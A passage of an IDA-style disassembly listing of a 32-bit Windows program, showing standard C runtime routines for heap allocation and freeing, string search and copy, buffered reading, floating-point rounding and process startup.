; FUNCTION CHUNK AT 00403A2E SIZE 0000002F BYTES
push 0Ch
push offset dword_4216E8
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_403A57
cmp dword_436974, 3
jnz short loc_403A2E
push 4
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_405ED5
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_403A0E
push esi
push eax
call sub_405F00
pop ecx
pop ecx
loc_403A0E: ; CODE XREF: sub_4039CF+34j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403A25
cmp [ebp+var_1C], 0
jnz short loc_403A57
push [ebp+arg_0]
jmp short loc_403A2F
sub_4039CF endp
; =============== S U B R O U T I N E =======================================
sub_403A25 proc near ; CODE XREF: sub_4039CF+46p
; DATA XREF: fabskl8p:00421700o
push 4
call sub_405CCF
pop ecx
retn
sub_403A25 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4039CF
loc_403A2E: ; CODE XREF: sub_4039CF+1Aj
push esi
loc_403A2F: ; CODE XREF: sub_4039CF+54j
push 0
push dword_427AC8
call ds:dword_41D108 ; RtlFreeHeap
test eax, eax
jnz short loc_403A57
call sub_405B83
mov esi, eax
call ds:dword_41D0EC ; RtlGetLastWin32Error
push eax
call sub_405B48
mov [esi], eax
pop ecx
loc_403A57: ; CODE XREF: sub_4039CF+11j
; sub_4039CF+4Fj ...
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_4039CF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A5D proc near ; CODE XREF: sub_403AAC+59p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421708
call __SEH_prolog4
and [ebp+var_1C], 0
mov esi, [ebp+arg_0]
cmp esi, dword_436964
ja short loc_403A9A
push 4
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_4066A9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403AA3
loc_403A9A: ; CODE XREF: sub_403A5D+19j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_403A5D endp
; =============== S U B R O U T I N E =======================================
sub_403AA3 proc near ; CODE XREF: sub_403A5D+38p
; DATA XREF: fabskl8p:00421720o
push 4
call sub_405CCF
pop ecx
retn
sub_403AA3 endp
; =============== S U B R O U T I N E =======================================
sub_403AAC proc near ; CODE XREF: sub_402FD8+1Fp
; sub_40303E+2Ap ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
cmp ebp, 0FFFFFFE0h
ja loc_403B59
push ebx
mov ebx, ds:dword_41D110
push esi
push edi
loc_403AC3: ; CODE XREF: sub_403AAC+94j
xor esi, esi
cmp dword_427AC8, esi
mov edi, ebp
jnz short loc_403AE7
call sub_40A004
push 1Eh
call sub_409E64
push 0FFh
call sub_407C57
pop ecx
pop ecx
loc_403AE7: ; CODE XREF: sub_403AAC+21j
mov eax, dword_436974
cmp eax, 1
jnz short loc_403AFF
cmp ebp, esi
jz short loc_403AF9
mov eax, ebp
jmp short loc_403AFC
; ---------------------------------------------------------------------------
loc_403AF9: ; CODE XREF: sub_403AAC+47j
xor eax, eax
inc eax
loc_403AFC: ; CODE XREF: sub_403AAC+4Bj
push eax
jmp short loc_403B1D
; ---------------------------------------------------------------------------
loc_403AFF: ; CODE XREF: sub_403AAC+43j
cmp eax, 3
jnz short loc_403B0F
push ebp
call sub_403A5D
cmp eax, esi
pop ecx
jnz short loc_403B26
loc_403B0F: ; CODE XREF: sub_403AAC+56j
cmp ebp, esi
jnz short loc_403B16
xor edi, edi
inc edi
loc_403B16: ; CODE XREF: sub_403AAC+65j
add edi, 0Fh
and edi, 0FFFFFFF0h
push edi
loc_403B1D: ; CODE XREF: sub_403AAC+51j
push esi
push dword_427AC8
call ebx ; RtlAllocateHeap
loc_403B26: ; CODE XREF: sub_403AAC+61j
mov esi, eax
test esi, esi
jnz short loc_403B52
cmp dword_427E4C, eax
push 0Ch
pop edi
jz short loc_403B44
push ebp
call sub_408412
test eax, eax
pop ecx
jnz short loc_403AC3
jmp short loc_403B4B
; ---------------------------------------------------------------------------
loc_403B44: ; CODE XREF: sub_403AAC+89j
call sub_405B83
mov [eax], edi
loc_403B4B: ; CODE XREF: sub_403AAC+96j
call sub_405B83
mov [eax], edi
loc_403B52: ; CODE XREF: sub_403AAC+7Ej
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_403B59: ; CODE XREF: sub_403AAC+8j
push ebp
call sub_408412
pop ecx
call sub_405B83
mov dword ptr [eax], 0Ch
xor eax, eax
pop ebp
retn
sub_403AAC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403B70 proc near ; CODE XREF: sub_41802D+84p
; sub_418CED+1Bp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_403BF0
mov dh, [ecx+1]
test dh, dh
jz short loc_403BDD
loc_403B88: ; CODE XREF: sub_403B70+58j
; sub_403B70+6Bj
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_403BAE
test al, al
jz short loc_403BA8
loc_403B9B: ; CODE XREF: sub_403B70+36j
mov al, [esi]
add esi, 1
loc_403BA0: ; CODE XREF: sub_403B70+45j
cmp al, dl
jz short loc_403BAE
test al, al
jnz short loc_403B9B
loc_403BA8: ; CODE XREF: sub_403B70+29j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403BAE: ; CODE XREF: sub_403B70+25j
; sub_403B70+32j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_403BA0
lea edi, [esi-1]
loc_403BBA: ; CODE XREF: sub_403B70+69j
mov ah, [ecx+2]
test ah, ah
jz short loc_403BE9
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_403B88
mov al, [ecx+3]
test al, al
jz short loc_403BE9
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_403BBA
jmp short loc_403B88
; ---------------------------------------------------------------------------
loc_403BDD: ; CODE XREF: sub_403B70+16j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_403C16
; ---------------------------------------------------------------------------
loc_403BE9: ; CODE XREF: sub_403B70+4Fj
; sub_403B70+5Fj
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_403BF0: ; CODE XREF: sub_403B70+Fj
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_403B70 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_403C10
loc_403C00: ; CODE XREF: sub_403C10+1Fj
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_403C10
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403C10 proc near ; CODE XREF: sub_418BAD+Bp
; sub_418BC4+35p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00403C00 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_403C16: ; CODE XREF: sub_403B70+74j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_403C3D
loc_403C28: ; CODE XREF: sub_403C10+2Bj
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_403C00
test cl, cl
jz short loc_403C86
test edx, 3
jnz short loc_403C28
loc_403C3D: ; CODE XREF: sub_403C10+16j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_403C48: ; CODE XREF: sub_403C10+63j
; sub_403C10+72j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_403C8A
and eax, 81010100h
jz short loc_403C48
and eax, 1010100h
jnz short loc_403C84
and esi, 80000000h
jnz short loc_403C48
loc_403C84: ; CODE XREF: sub_403C10+6Aj
; sub_403C10+83j ...
pop esi
pop edi
loc_403C86: ; CODE XREF: sub_403C10+23j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403C8A: ; CODE XREF: sub_403C10+5Cj
mov eax, [edx-4]
cmp al, bl
jz short loc_403CC7
test al, al
jz short loc_403C84
cmp ah, bl
jz short loc_403CC0
test ah, ah
jz short loc_403C84
shr eax, 10h
cmp al, bl
jz short loc_403CB9
test al, al
jz short loc_403C84
cmp ah, bl
jz short loc_403CB2
test ah, ah
jz short loc_403C84
jmp short loc_403C48
; ---------------------------------------------------------------------------
loc_403CB2: ; CODE XREF: sub_403C10+9Aj
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403CB9: ; CODE XREF: sub_403C10+92j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403CC0: ; CODE XREF: sub_403C10+87j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403CC7: ; CODE XREF: sub_403C10+7Fj
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_403C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403CD0 proc near ; CODE XREF: sub_417E66+104p
; sub_41802D+D9p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_403D6F
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_403CFC
shr ecx, 2
jnz loc_403D7F
jmp short loc_403D23
; ---------------------------------------------------------------------------
loc_403CFC: ; CODE XREF: sub_403CD0+1Fj
; sub_403CD0+45j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_403D36
test al, al
jz short loc_403D3E
test esi, 3
jnz short loc_403CFC
mov ebx, ecx
shr ecx, 2
jnz short loc_403D7F
loc_403D1E: ; CODE XREF: sub_403CD0+ADj
and ebx, 3
jz short loc_403D36
loc_403D23: ; CODE XREF: sub_403CD0+2Aj
; sub_403CD0+64j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_403D68
sub ebx, 1
jnz short loc_403D23
loc_403D36: ; CODE XREF: sub_403CD0+39j
; sub_403CD0+51j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_403D3E: ; CODE XREF: sub_403CD0+3Dj
test edi, 3
jz short loc_403D5C
loc_403D46: ; CODE XREF: sub_403CD0+8Aj
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_403DEC
test edi, 3
jnz short loc_403D46
loc_403D5C: ; CODE XREF: sub_403CD0+74j
mov ebx, ecx
shr ecx, 2
jnz short loc_403DD7
loc_403D63: ; CODE XREF: sub_403CD0+9Bj
; sub_403CD0+116j
mov [edi], al
add edi, 1
loc_403D68: ; CODE XREF: sub_403CD0+5Fj
sub ebx, 1
jnz short loc_403D63
pop ebx
pop esi
loc_403D6F: ; CODE XREF: sub_403CD0+7j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_403D75: ; CODE XREF: sub_403CD0+C7j
; sub_403CD0+DFj
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_403D1E
loc_403D7F: ; CODE XREF: sub_403CD0+24j
; sub_403CD0+4Cj
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_403D75
test dl, dl
jz short loc_403DC9
test dh, dh
jz short loc_403DBF
test edx, 0FF0000h
jz short loc_403DB5
test edx, 0FF000000h
jnz short loc_403D75
mov [edi], edx
jmp short loc_403DCD
; ---------------------------------------------------------------------------
loc_403DB5: ; CODE XREF: sub_403CD0+D7j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_403DCD
; ---------------------------------------------------------------------------
loc_403DBF: ; CODE XREF: sub_403CD0+CFj
and edx, 0FFh
mov [edi], edx
jmp short loc_403DCD
; ---------------------------------------------------------------------------
loc_403DC9: ; CODE XREF: sub_403CD0+CBj
xor edx, edx
mov [edi], edx
loc_403DCD: ; CODE XREF: sub_403CD0+E3j
; sub_403CD0+EDj ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_403DE3
loc_403DD7: ; CODE XREF: sub_403CD0+91j
xor eax, eax
loc_403DD9: ; CODE XREF: sub_403CD0+111j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_403DD9
loc_403DE3: ; CODE XREF: sub_403CD0+105j
and ebx, 3
jnz loc_403D63
loc_403DEC: ; CODE XREF: sub_403CD0+7Ej
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_403CD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF4 proc near ; CODE XREF: sub_417E66+1Dp
; sub_417E66+5Ap ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_2C], eax
call sub_40574D
push 8
pop ecx
mov [ebp+var_28], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_403E25: ; CODE XREF: sub_403DF4+4Aj
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_403E25
mov edx, [ebp+var_2C]
test edx, edx
jnz short loc_403E54
mov eax, [ebp+var_28]
mov edx, [eax+18h]
jmp short loc_403E54
; ---------------------------------------------------------------------------
loc_403E4F: ; CODE XREF: sub_403DF4+77j
test al, al
jz short loc_403E6D
inc edx
loc_403E54: ; CODE XREF: sub_403DF4+51j
; sub_403DF4+59j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_403E4F
loc_403E6D: ; CODE XREF: sub_403DF4+5Dj
mov ebx, edx
jmp short loc_403E89
; ---------------------------------------------------------------------------
loc_403E71: ; CODE XREF: sub_403DF4+98j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_403E90
inc edx
loc_403E89: ; CODE XREF: sub_403DF4+7Bj
cmp byte ptr [edx], 0
jnz short loc_403E71
jmp short loc_403E94
; ---------------------------------------------------------------------------
loc_403E90: ; CODE XREF: sub_403DF4+92j
mov byte ptr [edx], 0
inc edx
loc_403E94: ; CODE XREF: sub_403DF4+9Aj
mov eax, [ebp+var_28]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
pop edi
and eax, ebx
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_403DF4 endp
; =============== S U B R O U T I N E =======================================
sub_403EB3 proc near ; CODE XREF: sub_41B9D6+70p
; sub_41B9D6+160p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_403EDA
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_403EDA: ; CODE XREF: sub_403EB3+9j
mov eax, [eax+0Ch]
and eax, 10h
pop esi
retn
sub_403EB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EE2 proc near ; CODE XREF: sub_404078+A1p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
test edi, edi
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
jz loc_404032
cmp [ebp+arg_C], 0
jz loc_404032
imul edi, [ebp+arg_C]
mov esi, [ebp+arg_10]
test word ptr [esi+0Ch], 10Ch
mov [ebp+var_10], edi
mov ebx, edi
jz short loc_403F28
mov eax, [esi+18h]
mov [ebp+var_C], eax
jmp short loc_403F2F
; ---------------------------------------------------------------------------
loc_403F28: ; CODE XREF: sub_403EE2+3Cj
mov [ebp+var_C], 1000h
loc_403F2F: ; CODE XREF: sub_403EE2+44j
test edi, edi
jz loc_403FFE
loc_403F37: ; CODE XREF: sub_403EE2+116j
test word ptr [esi+0Ch], 10Ch
jz short loc_403F80
mov eax, [esi+4]
test eax, eax
jz short loc_403F80
jl loc_404063
cmp ebx, eax
mov edi, ebx
jb short loc_403F54
mov edi, eax
loc_403F54: ; CODE XREF: sub_403EE2+6Ej
cmp edi, [ebp+var_4]
ja loc_404003
push edi
push dword ptr [esi]
push [ebp+var_4]
push [ebp+var_8]
call sub_40333E
sub [esi+4], edi
add [esi], edi
add [ebp+var_8], edi
sub ebx, edi
add esp, 10h
sub [ebp+var_4], edi
mov edi, [ebp+var_10]
jmp short loc_403FF6
; ---------------------------------------------------------------------------
loc_403F80: ; CODE XREF: sub_403EE2+5Bj
; sub_403EE2+62j
cmp ebx, [ebp+var_C]
jb short loc_403FCE
cmp [ebp+var_C], 0
mov eax, ebx
jz short loc_403F96
xor edx, edx
div [ebp+var_C]
mov eax, ebx
sub eax, edx
loc_403F96: ; CODE XREF: sub_403EE2+A9j
cmp eax, [ebp+var_4]
ja loc_404039
push eax
push [ebp+var_8]
push esi
call sub_408DD0
pop ecx
push eax
call sub_40A6FF
add esp, 0Ch
test eax, eax
jz loc_404072
cmp eax, 0FFFFFFFFh
jz loc_404063
add [ebp+var_8], eax
sub ebx, eax
sub [ebp+var_4], eax
jmp short loc_403FF6
; ---------------------------------------------------------------------------
loc_403FCE: ; CODE XREF: sub_403EE2+A1j
push esi
call sub_40A03D
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_404067
cmp [ebp+var_4], 0
jz short loc_404039
mov ecx, [ebp+var_8]
inc [ebp+var_8]
mov [ecx], al
mov eax, [esi+18h]
dec ebx
dec [ebp+var_4]
mov [ebp+var_C], eax
loc_403FF6: ; CODE XREF: sub_403EE2+9Cj
; sub_403EE2+EAj
test ebx, ebx
jnz loc_403F37
loc_403FFE: ; CODE XREF: sub_403EE2+4Fj
mov eax, [ebp+arg_C]
jmp short loc_404034
; ---------------------------------------------------------------------------
loc_404003: ; CODE XREF: sub_403EE2+75j
xor esi, esi
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_40401A
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407F20
add esp, 0Ch
loc_40401A: ; CODE XREF: sub_403EE2+127j
call sub_405B83
push esi
push esi
push esi
push esi
mov dword ptr [eax], 22h
push esi
loc_40402A: ; CODE XREF: sub_403EE2+17Fj
call sub_403305
add esp, 14h
loc_404032: ; CODE XREF: sub_403EE2+1Aj
; sub_403EE2+24j
xor eax, eax
loc_404034: ; CODE XREF: sub_403EE2+11Fj
; sub_403EE2+18Ej
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404039: ; CODE XREF: sub_403EE2+B7j
; sub_403EE2+100j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_40404F
push [ebp+arg_4]
push 0
push [ebp+arg_0]
call sub_407F20
add esp, 0Ch
loc_40404F: ; CODE XREF: sub_403EE2+15Bj
call sub_405B83
mov dword ptr [eax], 22h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp short loc_40402A
; ---------------------------------------------------------------------------
loc_404063: ; CODE XREF: sub_403EE2+64j
; sub_403EE2+DCj
or dword ptr [esi+0Ch], 20h
loc_404067: ; CODE XREF: sub_403EE2+F6j
; sub_403EE2+194j
mov eax, edi
sub eax, ebx
xor edx, edx
div [ebp+arg_8]
jmp short loc_404034
; ---------------------------------------------------------------------------
loc_404072: ; CODE XREF: sub_403EE2+D3j
or dword ptr [esi+0Ch], 10h
jmp short loc_404067
sub_403EE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404078 proc near ; CODE XREF: sub_40413F+12p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push 0Ch
push offset dword_421728
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
mov ebx, [ebp+arg_8]
cmp ebx, esi
jz short loc_4040BB
mov edi, [ebp+arg_C]
cmp edi, esi
jz short loc_4040BB
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jnz short loc_4040C3
loc_4040A3: ; CODE XREF: sub_404078+7Aj
; sub_404078+88j
call sub_405B83
mov dword ptr [eax], 16h
push esi
push esi
push esi
push esi
push esi
call sub_403305
add esp, 14h
loc_4040BB: ; CODE XREF: sub_404078+16j
; sub_404078+1Dj
xor eax, eax
loc_4040BD: ; CODE XREF: sub_404078+BBj
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4040C3: ; CODE XREF: sub_404078+29j
cmp [ebp+arg_10], esi
jz short loc_4040D3
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp edi, eax
jbe short loc_404102
loc_4040D3: ; CODE XREF: sub_404078+4Ej
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_4040E8
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407F20
add esp, 0Ch
loc_4040E8: ; CODE XREF: sub_404078+5Fj
xor eax, eax
cmp [ebp+arg_10], esi
setnz al
cmp eax, esi
jz short loc_4040A3
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp eax, edi
sbb eax, eax
inc eax
jz short loc_4040A3
loc_404102: ; CODE XREF: sub_404078+59j
push [ebp+arg_10]
call sub_40850B
pop ecx
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_10]
push edi
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403EE2
add esp, 14h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404135
mov eax, [ebp+var_1C]
jmp short loc_4040BD
sub_404078 endp
; =============== S U B R O U T I N E =======================================
sub_404135 proc near ; CODE XREF: sub_404078+B3p
; DATA XREF: fabskl8p:00421740o
push dword ptr [ebp+18h]
call sub_40855D
pop ecx
retn
sub_404135 endp
; =============== S U B R O U T I N E =======================================
sub_40413F proc near ; CODE XREF: sub_41B9D6+D6p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push [esp+4+arg_8]
push [esp+8+arg_4]
push 0FFFFFFFFh
push [esp+10h+arg_0]
call sub_404078
add esp, 14h
retn
sub_40413F endp
; =============== S U B R O U T I N E =======================================
sub_40415A proc near ; CODE XREF: sub_40416Bj
; sub_410661+35p
arg_0 = dword ptr 4
push 0Ah
push 0
push [esp+8+arg_0]
call sub_40AA06
add esp, 0Ch
retn
sub_40415A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40416B proc near ; CODE XREF: sub_401E4D+9Dp
; sub_401E4D+ACp ...
jmp sub_40415A
sub_40416B endp
; =============== S U B R O U T I N E =======================================
sub_404170 proc near ; CODE XREF: sub_41AFF3+58Cp
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp dword_4357FC, 0
jz sub_40ACF3
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_4041A4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_4041A4: ; CODE XREF: sub_404170+23j
lea esp, [esp+8]
jnz sub_40ACF3
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_41D3B0
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_41D3D0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jz short loc_404232
cmp eax, 0BFFh
jl short loc_40426A
psllq xmm1, xmm2
cmp eax, 0C32h
jg short loc_404203
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_404203: ; CODE XREF: sub_404170+86j
; sub_404170+E1j
ucomisd xmm7, xmm7
jnp short loc_40422D
mov edx, 3ECh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_40AA2F
add esp, 10h
loc_40422D: ; CODE XREF: sub_404170+97j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_404232: ; CODE XREF: sub_404170+74j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 6
cmp eax, 3FFh
jl short loc_404271
cmp eax, 432h
jg short loc_404203
andpd xmm0, oword ptr ds:oword_41D3A0
addsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40426A: ; CODE XREF: sub_404170+7Bj
fld ds:dbl_41D3E0
retn
; ---------------------------------------------------------------------------
loc_404271: ; CODE XREF: sub_404170+DAj
cmppd xmm3, oword ptr ds:oword_41D3C0, 6
andpd xmm3, oword ptr ds:oword_41D3A0
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_404170 endp
; =============== S U B R O U T I N E =======================================
sub_40428D proc near ; CODE XREF: sub_4044D2-1A0p
; sub_4044D2-103p ...
arg_0 = dword ptr 4
cmp dword_4275FC, 1
jnz short loc_40429B
call sub_40A004
loc_40429B: ; CODE XREF: sub_40428D+7j
push [esp+arg_0]
call sub_409E64
push 0FFh
call sub_407C57
pop ecx
pop ecx
retn
sub_40428D endp
; =============== S U B R O U T I N E =======================================
sub_4042B1 proc near ; CODE XREF: sub_4044D2-11Bp
cmp word ptr ds:400000h, 5A4Dh
jnz short loc_4042EF
mov eax, ds:40003Ch
cmp dword ptr [eax+400000h], 4550h
jnz short loc_4042EF
cmp word ptr [eax+400018h], 10Bh
jnz short loc_4042EF
cmp dword ptr [eax+400074h], 0Eh
jbe short loc_4042EF
xor ecx, ecx
cmp [eax+4000E8h], ecx
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4042EF: ; CODE XREF: sub_4042B1+9j
; sub_4042B1+1Aj ...
xor eax, eax
retn
sub_4042B1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4044D2
loc_4042F2: ; CODE XREF: sub_4044D2+5j
push 60h
push offset dword_421748
call __SEH_prolog4
and dword ptr [ebp-4], 0
lea eax, [ebp-70h]
push eax
call ds:off_41D1A8
mov dword ptr [ebp-4], 0FFFFFFFEh
mov edi, 94h
push edi
push 0
mov ebx, ds:dword_41D0FC
call ebx ; GetProcessHeap
push eax
call ds:dword_41D110 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jnz short loc_40433D
push 12h
call sub_40428D
pop ecx
jmp loc_4044C7
; ---------------------------------------------------------------------------
loc_40433D: ; CODE XREF: sub_4044D2-1A4j
mov [esi], edi
push esi
call ds:dword_41D068 ; GetVersionExA
push esi
push 0
test eax, eax
jnz short loc_40435B
call ebx ; GetProcessHeap
push eax
call ds:dword_41D108 ; RtlFreeHeap
jmp loc_4044C7
; ---------------------------------------------------------------------------
loc_40435B: ; CODE XREF: sub_4044D2-187j
mov eax, [esi+10h]
mov [ebp-20h], eax
mov eax, [esi+4]
mov [ebp-24h], eax
mov eax, [esi+8]
mov [ebp-28h], eax
mov edi, [esi+0Ch]
and edi, 7FFFh
call ebx ; GetProcessHeap
push eax
call ds:dword_41D108 ; RtlFreeHeap
mov esi, [ebp-20h]
cmp esi, 2
jz short loc_40438D
or edi, 8000h
loc_40438D: ; CODE XREF: sub_4044D2-14Dj
mov ecx, [ebp-24h]
mov eax, ecx
shl eax, 8
mov edx, [ebp-28h]
add eax, edx
mov dword_427AD8, esi
mov dword_427AE0, eax
mov dword_427AE4, ecx
mov dword_427AE8, edx
mov dword_427ADC, edi
call sub_4042B1
mov [ebp-20h], eax
xor ebx, ebx
inc ebx
